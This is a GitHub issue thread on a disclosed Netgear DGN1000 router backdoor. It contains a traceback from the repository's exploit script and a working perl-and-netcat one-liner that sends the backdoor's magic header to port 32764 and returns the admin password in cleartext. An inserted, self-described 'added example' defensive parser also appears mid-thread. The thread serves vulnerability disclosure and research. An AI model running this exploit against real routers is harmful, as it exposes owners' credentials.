DGN1000 #3

Closed
grigio opened this Issue Jan 2, 2014 · 6 comments


@grigio
grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway, with the DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I also tried over the internet (with or without remote administration enabled) and it doesn't work, so it seems to be just a local LAN exploit.
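The traceback above comes from calling struct.unpack on a recv(0xC) that returned fewer than 12 bytes. As an added example (not code from this thread or from the repository), the following defender-side parser walks a captured byte stream from port 32764 and flags messages carrying the signature 0x53634d4d shown above, while treating a short header or a short payload as truncated instead of raising struct.error. The header layout (signature, return value, payload length) is taken from the traceback; that a payload of ret_len bytes directly follows the header, and the sample bytes, are constructed assumptions.

```python
import struct

# Signature value seen in the perl one-liner above (0x53634d4d, "MMcS" little-endian).
BACKDOOR_SIG = 0x53634D4D
HEADER_FMT = '<III'          # signature, return value, payload length (from the traceback)
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 12 bytes, i.e. the 0xC in s.recv(0xC)


def parse_messages(data):
    """Split a captured byte stream into (sig, ret_val, ret_len, payload) records.

    A record is emitted only when the full header and its payload are present.
    Anything left over that is too short is returned as ("truncated", bytes)
    rather than raising struct.error, which is the failure the traceback shows.
    """
    records = []
    offset = 0
    while offset < len(data):
        if len(data) - offset < HEADER_LEN:
            records.append(("truncated", data[offset:]))
            break
        sig, ret_val, ret_len = struct.unpack_from(HEADER_FMT, data, offset)
        start = offset + HEADER_LEN
        payload = data[start:start + ret_len]
        if len(payload) < ret_len:          # payload cut off mid-message
            records.append(("truncated", data[offset:]))
            break
        records.append((sig, ret_val, ret_len, payload))
        offset = start + ret_len
    return records


def backdoor_hits(data):
    """Return only the complete records whose signature is the backdoor magic."""
    return [r for r in parse_messages(data) if r[0] == BACKDOOR_SIG]


# Constructed sample capture: one complete message with a 4-byte payload,
# followed by 5 stray bytes that would have crashed a bare struct.unpack.
SAMPLE_CAPTURE = (
    struct.pack(HEADER_FMT, BACKDOOR_SIG, 0, 4) + b"pw=x"
    + b"\x4d\x4d\x63\x53\x00"
)

if __name__ == "__main__":
    for rec in parse_messages(SAMPLE_CAPTURE):
        print(rec)
    print("backdoor signature seen:", bool(backdoor_hits(SAMPLE_CAPTURE)))
```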

@elvanderb
Owner

I should have added a little loop and checked the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

@elvanderb elvanderb closed this Jan 2, 2014
@teetaucher

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

@elvanderb
Owner

Thank you, I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

@grigio
grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you recommend any alternative firmware without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported.

@elvanderb
Owner

No, sorry :)

@teetaucher

Update: The DGN1000B is the firmware for countries which use Annex B (e.g. Germany) for DSL.
